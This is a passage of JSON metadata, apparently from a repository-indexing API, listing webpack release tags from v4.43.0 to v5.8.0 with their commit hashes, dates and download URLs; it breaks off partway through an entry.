,{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38